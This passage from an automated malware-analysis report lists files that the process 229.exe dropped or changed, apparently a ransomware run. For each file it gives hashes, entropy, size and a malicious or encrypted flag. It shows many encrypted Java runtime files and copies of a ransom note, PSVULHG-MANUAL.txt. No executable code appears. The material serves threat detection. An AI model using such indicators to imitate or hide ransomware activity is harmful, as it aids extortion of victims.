C:\Users\user\AppData\Roaming\.jre\lib\deploy\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\deploy\ffjcext.zip Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	14696
Entropy (8bit):	7.984027106538435
Encrypted:	false
MD5:	ED9288F0A2DE894377E30F56F6B4DAD2
SHA1:	275894BE98EB69610774BED3A54729A55BAF6B5B
SHA-256:	41E644141AEECDCF55C85775A0E2E55F65F5BD9809AF098A504F9082078AB557
SHA-512:	CC3F3AD9724416ED4A2B6152AEB1C5D7DF31E1A3FC54CB6B3D3F2D3FC5E1933A365497067BD7935906168880FDED2B4E183BDA134326A8A2AB7DCACC29E08B30
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3400
Entropy (8bit):	7.941049498459695
Encrypted:	false
MD5:	51EE03AF4EE942145EC571A9D772F820
SHA1:	CE36963D109680602CFEEAE001B0CF59F997F03C
SHA-256:	B81A38AF7A977156FD37814B046A0DC40458644A6E5EA3F148866880BE59C6E7
SHA-512:	815C24BB25454CC5161B29D837361B655D1383CA5BA1ECB84289479780EF93B2E232BE238984484C08796C42D750DDE9821315534A5921652C603BCD2E967362
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_de.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Dyalog APL version 40.206
Size (bytes):	3846
Entropy (8bit):	7.945338388428703
Encrypted:	false
MD5:	0D4C49F5CF82B7400A26E268AC75AC35
SHA1:	74855A6D527F89BB6613A7C96D0DAC629F8976D8
SHA-256:	7710DD842C7939D43D4501F2B141855A18CD84FC6F232D18281B0FDA8C6E27E2
SHA-512:	B33A799E730B084BAF5A8CEC91B6AE807AC301E792ECE091BAEB9834234133FB95D8630A2A4DDFCE390B864536C60ECF064883A43B949C650E7E0E03D6AE2CF0
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_es.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4140
Entropy (8bit):	7.952609672474991
Encrypted:	false
MD5:	D3C537E138A071B363DBF7616932E195
SHA1:	15C54D109D2EC5F7D68CE22152E554BF82E3000F
SHA-256:	1BCC0474CD45C48F6BC05504EA935681D21760AEC1D07A752859F305D158D879
SHA-512:	03BD51E1F8FB13A67B60EF1A7DBB26A99B223CCFA52A696665074EB9B433BE3241829514550AAE2624B99AD6A1598447E58E88BA32522CDC2B512AB9D3E14421
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_fr.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3949
Entropy (8bit):	7.958333100824467
Encrypted:	false
MD5:	74AF39CDE0740D9DD0C9474D12CF9B6D
SHA1:	8E861ABCC3383311CDF9CCEA9A419E5E2DE8F879
SHA-256:	C097CE3F48EBE5F8AEE1C74F9ED362E118E3D0133B20CB7D89DEC22ED00D256F
SHA-512:	A70AB4BAABE5A162DC5E5CD7D893F586C34E0069091B1DAC5FB974037A386D4FB72D31053C4AA0D06B7CDF7C9C2CF3B45BB9CA66B0F32988AF147A4AF5F9C2B8
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_it.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3763
Entropy (8bit):	7.939373840261223
Encrypted:	false
MD5:	3004209F63A9DD09DE0A34637D9F39B9
SHA1:	E628E3A1B109354482C3682B99F8BCF21A1D8B46
SHA-256:	C992C3C6280A80DDB5CD7FCA580CFA7D9E8EAB61C015D7E2935E8B8A8378F52A
SHA-512:	EBB1A18397CE3542E95F274F4468AEC96A6E04E566F441574AF48FF6586546071A8076DDB97B92E9B0CE2231750EC0B26B2EB4832ECCD323054D348D8EB16492
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_ja.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	6889
Entropy (8bit):	7.976866135052059
Encrypted:	false
MD5:	C62D29AFDE30E707A5A1E9968700A05C
SHA1:	87054828BAB4D1C111D7DCADF3A4148CA827C305
SHA-256:	173FB8E7B2C662A3E0A0712EC60D5B6381A99D7FFF2D5F06177E81AFF6927B97
SHA-512:	5B0D41C871FDB0FDDCCC919DE2658E920BB6767C80D9813A5EE60B1AF3190163D717E720DC35AC995E76722BF696AB0BDA7B10F4976B527BAD6698788CDF1D11
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_ko.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	6252
Entropy (8bit):	7.965405110654587
Encrypted:	false
MD5:	CF55720DB7B1BCEB7B4EB6A1042C4B65
SHA1:	538921E356726DAB58A41075A2DA20D49A25B315
SHA-256:	1B5C46FCAD875AA8632B35E841D4D15E4161192C7E763E907ED62C43B5BF54FF
SHA-512:	5B1B9D9536BB9F662E127080F65B1B838330967B1799C2B72353965FBA326E3B0F5888B16EF9B4A6FE547C56CA67A3EC771E1E83E92B4FC5E55F3997D53DAB9F
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_pt_BR.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3825
Entropy (8bit):	7.946121661601361
Encrypted:	false
MD5:	D2D66C38A759DD28C8DD95DA50156081
SHA1:	8DA0DB8E35FC552DB697BC5EA32D93FFFA01C3BC
SHA-256:	1FB82B522807400AB789B2495470C6AF87BB800655B97DE38020601BEFB46D6D
SHA-512:	D31C34A834765B530604FCA9D0AED0BED13864D6C12C4386442474B40B24A55F8345829A01B3B0688C9ECF95FAB29809C1316BCA9E18B026F17F2B8631D73D23
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_sv.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3924
Entropy (8bit):	7.949136817097067
Encrypted:	false
MD5:	C672C3C30C8ACAA6AEC5F9BE5E02A45E
SHA1:	964C413E274D0F2B66BC9A69C6D6EAE1DBA97492
SHA-256:	6CA3F0829045D30E507AEA46FF35CF53C86316BBB336664B442B007DDE383428
SHA-512:	1D7EE53E3BFD835900173504662ADCAFFD63B7C6ACDD45ADF8ADFB9FBA0493C4DDCE69A2D04D1AB9B57BBD8315C3E36B11E524AF46261AF3F360E2E2505322CB
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_zh_CN.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4612
Entropy (8bit):	7.9539507906908975
Encrypted:	false
MD5:	5099DE74D9C3ECDFCD78F18220D40F94
SHA1:	BFEADF66641EE56864D090C3C222638D26D07AF6
SHA-256:	29EB86007A5EA43F1D2263B6E5037451EA202A1F17EE1B43E27E57B27B0B1F72
SHA-512:	791BD92D085EEC87A22D513BA4E534666CB003D0BBB0A1D67C6CEB7E25DD1B54E72FC62E242D51779140CBD160404890B3743086A5B503E1FF3F7704A77CDFFB
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_zh_HK.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4292
Entropy (8bit):	7.9621604870500695
Encrypted:	false
MD5:	5C8D8A691CA039B93E6C150B1F2C52B9
SHA1:	E1561CA9ABAF6BA4FD464FC37A720E095D3729EF
SHA-256:	15C07A8CE4FC0BEB87A761284D8D0F9265A64AD2AAF456B90773903C03D08E45
SHA-512:	0A835A706024BBDAFA69701C010C8B315990F5D3C140B574535D8EC0FE216A959B4ECBED49B13365B6E813037E32CE0D3CE2FAF39E70A3D2427D0829B99E58FA
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\messages_zh_TW.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4292
Entropy (8bit):	7.953289664786611
Encrypted:	false
MD5:	E158F7CD6312D2F80DDDB6965DF1049C
SHA1:	46F22591FEBEC763FBBBE25C41190CACE248A349
SHA-256:	6328B11763D3EFDD5D5AA3ECA4D9971D0E9DD873BC5EA420EA445F194F7F4F49
SHA-512:	8759BAA41BDB1B9236CAB339D001B0086FD338335AC5171D386A1998D9E49B5368FCEF61E63175E05D58556F95776B38193BA882F39E903285737E0FA9976798
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\splash.gif Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	9130
Entropy (8bit):	7.977411176911667
Encrypted:	false
MD5:	592C0BB969D81FE685D3971373380E70
SHA1:	4D52EFE75A960B10EFBB4CEF7063FBF6FE2200D0
SHA-256:	95E5BAAF88D9B605EF06D55CF811C43194EF4413935A33F0217CE5F23AE17B8B
SHA-512:	F4E08636A9516F3C956ACEB640423435A4248C64EB4C2A579255B7B9A9FFD1B661EBCDED5D12D1C6E8E4843AA1933E9D79AEA5DF0E8E875367C3D393E8283E2C
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\splash@2x.gif Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	15816
Entropy (8bit):	7.988294227717814
Encrypted:	false
MD5:	BA264123C50585B52614D6D998B61980
SHA1:	1C608E068C631023C2D1898E7E6602A6B9F46E7E
SHA-256:	7F10820580538CE1F4B0500D59F03D015A60E599802B46710C2DEDC8463B18BA
SHA-512:	508AE75CA7A9D7AE39771F74EE2E1DF29F179692AABE8F9A355CB44F848B98C3DE01850358438E76A9AF1D0A119D9F4D1CDB2E21F99F7CE90719BD3AA663C66B
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\splash_11-lic.gif Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	8345
Entropy (8bit):	7.975201936221752
Encrypted:	false
MD5:	7362219CE7F365027179BDD5D5D7FFE4
SHA1:	20DD217FB1221949855212F2B4CF5BA0874CC871
SHA-256:	D40A3A1E70686C028F4C0A51FA3D5C9FBC0D70CE80F2EA1FB3F8BB163C4A7B54
SHA-512:	632E2D2AE04E45F10BC8E99637F82B246029FE827ED46683BD4EFFB862286A923BB2F4F8A83321EADD9CFA52A8D801335A076666B6BFACD2CB85E2849123FDAE
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy\splash_11@2x-lic.gif Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	12790
Entropy (8bit):	7.984726262820882
Encrypted:	false
MD5:	F5357F7F752FCD0929D484FF38F39809
SHA1:	6AD8A744717BC54530342079ED8D303039AAB0AE
SHA-256:	9BD64AB10DEDC7142B2F45C79CDD399BA4E5836BF8DDA789C458477E55969684
SHA-512:	78E72D0F9A3976AB0AB1CB5F8FBC582084670FF84EE00832464499EE2C78281B981052DF85666AB6898B3795E781747690295518A2E88559C27C087191B39A2C
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\ext\access-bridge.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	197444
Entropy (8bit):	7.999075093865089
Encrypted:	true
MD5:	E915722A2039B27A79B701F70039B927
SHA1:	7F84185D54DFAAD1EDCC19EBBF941DC8937281D2
SHA-256:	47E60DBC6E2A35F241FCCEFD055194E70C7F23A32722FF438042B29D0CA52689
SHA-512:	5C27881B95FF8AF7F92E1E0649252F3F35CAFE8F8140A7A9D48F64CB758AB83F5A9D640685D089AB156BA21FDA5D9FE80D430F5C3D06A23D72484C56815592AF
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\cldrdata.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999825357306643
Encrypted:	true
MD5:	81FF0F239811E63F6703BF4E897A651D
SHA1:	B501BB28DEB6F65657C65FBC87E1E0C3E395D28A
SHA-256:	805ED3641A577268167BA4BCEFFE2F5252615AC5EB7BC70C28BF04AFF0033078
SHA-512:	F4A77E7F6981CB3C8D2B24B23F52A1B22FCB962318E9D791427D1894052AA5E31BED638815A27BBB35EF9DC3293C11B5540A66CFE6B5735F6219F4017F23C0FC
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\dnsns.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	8826
Entropy (8bit):	7.979058222761311
Encrypted:	false
MD5:	7DA6978664CF55EB7C00A6073D01C5B8
SHA1:	D0C67955CDA5F1755044E385A593DC1E0D17EA53
SHA-256:	5765F069B50BD78ABFAB0785B9FEDB04F3AFB6B9C1F921AD4B2E3E4AB17B6F0B
SHA-512:	E431128CC1D0368C2AD184586C12943166059FB74F55E834B885F48B294D61CD28AB71C8CA6B8D9CEB28E0A9F88951EFA120101FAE5B89E0BC550B3205371CD9
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\jaccess.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	45056
Entropy (8bit):	7.995947759565815
Encrypted:	true
MD5:	6CF45BB937FB2F15BBD735A357603E34
SHA1:	7CF9D10C358F70CB5DEE2B008F9D12EC3325D892
SHA-256:	8ED72596472AC790F413EE2EB01C02126C950CA0EE2B6F6EA864D92DC126E428
SHA-512:	D726B0893EC201FC267A8ECFADFC12AAF21FEDF9A0C206A8B9AC714EBB0A3889545502B8CFB901735FC7205FC01EA4F4A9953548204FB5B92E432025070BC61D
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\jfxrt.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999810755851377
Encrypted:	true
MD5:	C27EB46ABDD67AE26AA0BF3D2232D0EE
SHA1:	ED52D2146AF48DA8A9499C589D3FE76A46CF0A9F
SHA-256:	11AAD1C085463046A929A0D57878AF25CEE612D705E96DC482ACC63C681531D2
SHA-512:	0AE1FE80D4D517CD261A4F6033C446060F13DEF3E4B5633B58428761F01DB506C4D40FBE7EB7444659F6001A34A76D28FE292E9487BBB524422A5E6BB4B4F669
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\localedata.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999838540106101
Encrypted:	true
MD5:	0E8F732B4AC582A07973203C4D96E36A
SHA1:	75C5FE8890B6DC09A09AAECE413B508CAE71740C
SHA-256:	D351F0FA15F52BE1655449A078079B434D0982A5FDD76E29E2BE37A44842C63F
SHA-512:	1FCCBC5929A70AD68CBA212EEFCD1E86141530D9F7C764F3F5E7060F767AA27FFE5121AEF190C515E0C89ADBF52E2AB4AA940315AB1CA16E0B62B33E536FBBE8
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\meta-index Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	2051
Entropy (8bit):	7.882064810693446
Encrypted:	false
MD5:	D9CE03F4B9D32DDB08184BAA843D7A0A
SHA1:	9864D1D370A49488CF87FFC0A0AB75E5C576A9E8
SHA-256:	7F728F9C9BE885FAF0ED3E755DC16B4EA6993D2601CCB33EAF2839F87664952D
SHA-512:	02BFC429AC5FA03DBA98F37E406F2833D4EABEFA318A32FD1620C0E7F1BEA0251914103066EA840499CFBB47AFE1817E47694F3578DDDDAE83F68F844728B625
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\nashorn.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.9998250276477245
Encrypted:	true
MD5:	A6318DA9BECBEE793A0DB05754509B23
SHA1:	6E0F960140F90A37DF5FDB16A06459E3901F8AB0
SHA-256:	12E49BF1F74FFD63586039D40AD7A753C142F3F63BDDC794570E23645A88DE30
SHA-512:	B198C48FEF9B5AAF521BD72564FF98967BC7D685C3DCFE4F529CD46A5F1D8BEB3772091AFAAD8EA94C06F58FA5BF063F972C8AFC9532CFE085F7F9584A54308E
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\sunec.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	42212
Entropy (8bit):	7.994882258695362
Encrypted:	true
MD5:	A6D543505E537C1523800A1A14A3E7DB
SHA1:	CF0112A038199D53ECF37202400CA59C3835F726
SHA-256:	E46BD8672EF03FE69F5FD70A52B32C8EFA322D29266F0CEEEFC92995B1AEAC06
SHA-512:	9262E410E99761F809EE36A082E96F166CA41150FE23E80A97440D9447FD8DC4EB84A5F2D13881450ECC8534F683E9EA64F0DAD1DF90D9839E00E247541661CD
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\sunjce_provider.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	DOS executable (COM, 0x8C-variant)
Size (bytes):	278378
Entropy (8bit):	7.999381216791984
Encrypted:	true
MD5:	4A8787E4B900D724D5CB1FE53794E5E1
SHA1:	D7992D529BDD0C7EC27E68D143192B7D8F016E14
SHA-256:	4014238EFBD11FF38563F232F51B542F4B061CADEE042DB276B31C860EAC31F3
SHA-512:	68A1129E0EDC08BCE208C9D9AE750AE8D2CFA2945120575F4668D52A3D3DC0A99B1DFF43EA898E4E542994D2DD48634EA6C7F2363AEBF2AB730DDE48F5B98964
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\sunmscapi.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	33683
Entropy (8bit):	7.99492061051869
Encrypted:	true
MD5:	CA18BB7C76A0DA00344A5CAFB253DFAD
SHA1:	C1D73F25821D4B1113D7E7947DBE173DAC34781D
SHA-256:	FEE2B3A91F3BEEA365F7FD7760B475332BA08E001FF6EA464E2F686EF082CABC
SHA-512:	F96E7A149D63EE8B989331FD79475BF8A0515AA2A2A1DD28C01B6A08AB2D176D404A12771C6E568B0A06853F2D9427F522A93C40F59509E361183A9F3A86716C
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\sunpkcs11.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	COM executable for DOS
Size (bytes):	250671
Entropy (8bit):	7.9991809392493565
Encrypted:	true
MD5:	B5D58359CA61E1956AADC3DD00BA8682
SHA1:	578BB37D3C476BDA69EE2DF06E50B642A673A59D
SHA-256:	44928D3A5AD7E504D459508A7E369E229B0E44DB06A91EF3B8FA90425917E1B7
SHA-512:	A7A6C1B5C4702951C211BED60EA2F548E0F6DEB2A590505CDA4C185F4FF578AA584BE8CCABCEE598B9EC597DBDF4001E56F5C4BD29ACEF40FFB3047301312296
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\ext\zipfs.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	69504
Entropy (8bit):	7.997101593506237
Encrypted:	true
MD5:	04E587926C33566C72741EDDADE8876C
SHA1:	926C8781A3DACC726A9B88BC46CD4653609A7F73
SHA-256:	009BA4CC3087637558D236FC2466EE63DBD2D6BA6953D0CCE7DB94AF09F2BF87
SHA-512:	E1EAC19A05E5C31A3A0FB0CF568ED7AE9FB9A4B4AFAACC2F396F06E06D6E1CB57F7160AB1BD6C69CB4A184E53CE6B0E0B349A2C0BA1EF340C8517ABA51E84CA3
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\flavormap.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4468
Entropy (8bit):	7.9587499132067965
Encrypted:	false
MD5:	E615DBACCCA153D46F4EB300FFDBE1E0
SHA1:	659E28AA34DD8E0389D211565637434287D45CA8
SHA-256:	AC97B4CAAE6FB6EE859282CD9CBF9E445B91316613DE44251A771E48F09DEE15
SHA-512:	1389ABD17297F6C72713A15DA8969D212134BD39FC2B2BD3A71415A504912015B8C130059EB9758B30B3C507A03FA9D905D56B246C396CAC69E125BD2111EB6B
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fontconfig.bfc Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4310
Entropy (8bit):	7.957102949863987
Encrypted:	false
MD5:	36C665E97AF81FA5A7B76CCF445781D6
SHA1:	B285A631F8C4E68E1164C59584159CA788F12577
SHA-256:	55645A3E0C4198A05B457725F92E335F047D78ABEC23DBBFBBD7F93CB7D52D4C
SHA-512:	A419C186CE3247C48AF7EC7649647C7F67E2F97E9ECEB3D356FBF434AE6FD1B3B552C3E9B764290FC6C72BEB0CF5F5FCED96FFC5731C756EBB1B2AD95AA6CA73
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fontconfig.properties.src Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	11108
Entropy (8bit):	7.983992536127226
Encrypted:	false
MD5:	8BA1750D6E5909765BC938130F8CC299
SHA1:	63DCC69A346B9499A5369907751F84DCD31A9E3C
SHA-256:	85D0094087D1D12A27B530C9BF5FB6C931CA6A5195F74A10F45DCA1A107C1168
SHA-512:	4AC644A3F31FF2BA05A14C1745603C26C7B66CC41E23E31C36D48C3393E60E3C4F7BFB312A31700E0A7992FBD96124D71E8A23D2CE73AD8C8B2E61768CB5B4A4
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaBrightDemiBold.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	75684
Entropy (8bit):	7.9976497327521745
Encrypted:	true
MD5:	7B2B8C50959045AB01B5850623FD6C3C
SHA1:	C0E80FBBD065304303253658EF898A7DCFE9F48E
SHA-256:	EAB15CC118688A557844384F6C3BB43C11AE87323A5ED17865131906F0311C26
SHA-512:	B5EFE5C8E8AED1C4BA7FF7CDA3A38AD3C3B3CD40E27B7537FB6E77255408BE4B203F24324B74FF07797F33B4A3995AB13E84BC27B691180C2199CDD741D0A820
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaBrightDemiItalic.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	75664
Entropy (8bit):	7.997196454448763
Encrypted:	true
MD5:	E3B44824802DD96AFFBA61E4FD970471
SHA1:	862BE55D43C3D78268AA40EFD30AFA83B53437AD
SHA-256:	248CA89942EC8C5FC7E06553FE206C94DEDAF2D7BB69E11BAD894B1810DF9E64
SHA-512:	1C7BBD7FBF9AAE66ECC1F24083CBBEC06D41F265862B7839FF2BD189559FDECD28443602225126F27CE9ADE97B957D1800370CF4C677E603C9CC262E050A6506
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaBrightItalic.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	81396
Entropy (8bit):	7.9975482447172945
Encrypted:	true
MD5:	C10AFB58FE8C143E26079E112E7FEED4
SHA1:	C557DD9CEAE42CC7F8CC5D6AC3DA701A8613D34C
SHA-256:	5444D2121038A4C98192150FB2CE2D8DBC9C59F3A1798723A84648AB5E847A5A
SHA-512:	6CA9031ED227679F4BCA95DCC380F2299F35EA91A616A5A9C91024DC1DF3527E341AB1564D8F0E915FEE9C6FD8EE3BA59C20F127D3CFB95A98DAAA89E6825E56
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaBrightRegular.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	345448
Entropy (8bit):	7.9994754021377865
Encrypted:	true
MD5:	2D0D94B8F227C3C630AA912917D11F54
SHA1:	000C2066A2933D28BF7112C22FA9EE1F7F2023F5
SHA-256:	E52F15C0C00D15290648043885938777570AA5D1422F22B47918FE34794E6F8E
SHA-512:	AEE76CB6EE287CBB868795EF56C382FB964CBF924A0F0AB279B4A84A7A878D1BA44348EF27DBE1E25E4713812571A23A8CD78D1E4DC29A523CDBF5284BD15D87
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaSansDemiBold.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	318436
Entropy (8bit):	7.999379300793052
Encrypted:	true
MD5:	DD92879DF264C122C49C8D135AA4B8DA
SHA1:	5EA2AED2DDBCB24E89793CA4FA0A627134991BF7
SHA-256:	C99ADDD4734D5BAEFD729122C2D66F0806BCAB471B61EA9CE9A9E480ADF0355C
SHA-512:	FD065DB7D6A5DAB743B9D03A710B6712759B86F1D4D1845BA2CB0180A462A2E3AD6C7F04A6490634C91744EA04D663B978F451916114FF0AFFB1400FF5040EE3
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaSansRegular.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	698776
Entropy (8bit):	7.999741658592035
Encrypted:	true
MD5:	91EEF2897A2B32B9217071B4A6B28CC5
SHA1:	1F61B6AC8BC1EFE71A370EFCA4290EC8F6B9EA54
SHA-256:	61CCB30F58C472A5AD996A7F736419B56AAFCF027CCD304E38681105A68C5ACC
SHA-512:	F017B12B2170B4662BC22D29D4F364AA51B2EBE98E4B2C32B43C4243DCFEBF6D8286DB2E43D60EB9F50CAD2DD3EF57DC9DDFB13F5694C09695A3295493C5C6FC
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaTypewriterBold.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	234608
Entropy (8bit):	7.999219188585774
Encrypted:	true
MD5:	DECD9BC575C210163A5793BC6C682E57
SHA1:	3C837930DF0C233A0DCF84887973A1DA6775D443
SHA-256:	08BFA4FF265FDD29AC9152DA1B0FB65D772C5090DEE60657D31414709A07070E
SHA-512:	017DE0C594AACDEBC9BEDC4FA7A19C62FE05A8713DF4675ED5A26BF96D5576E03159F6C2303DC04C070AC8767C74A677DABCC0AE60655F509AEDC5304B2F0E98
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\LucidaTypewriterRegular.ttf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	243240
Entropy (8bit):	7.9991968820525265
Encrypted:	true
MD5:	3E184AB070C944899E4A2223CB0E061C
SHA1:	D00E3B392FCC60AFFDFF8AB266DAB6C1C6334CD0
SHA-256:	0FBAAB36E6DCEB3D519BF78C522AAC0A07AB637E339C22050A20B4C98BC6ED01
SHA-512:	DEBFFF60487373D78FA92FA6EFF9AC11AD76585CF7CA2F478C2D82E9CF325CAFD5045A48390CA7B87F2C4DA887A8E0827BD355050E0B8BE5B1B6E82487F3E9FD
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\fonts\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\hijrah-config-umalqura.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	14502
Entropy (8bit):	7.986596953625172
Encrypted:	false
MD5:	69B5A767D15D65359E3BE8AFD5E8A75E
SHA1:	F2E2239D6E6814A7CE896EDFA1A0887D44177573
SHA-256:	51E64DBF71877D8A65BA8821A13D7AD5287144BB22B2DD1AD22AF1D9CAD59CB9
SHA-512:	A58079B4693C8F8A225D5ED7E7A2EF0AA8C6D6E2A1E6FD8353351FEB479A003C59F2C2656F2751CA7A23A4C9E591CE7EEFB38B1E22239EB5447BB09D818497DA
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\i386\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
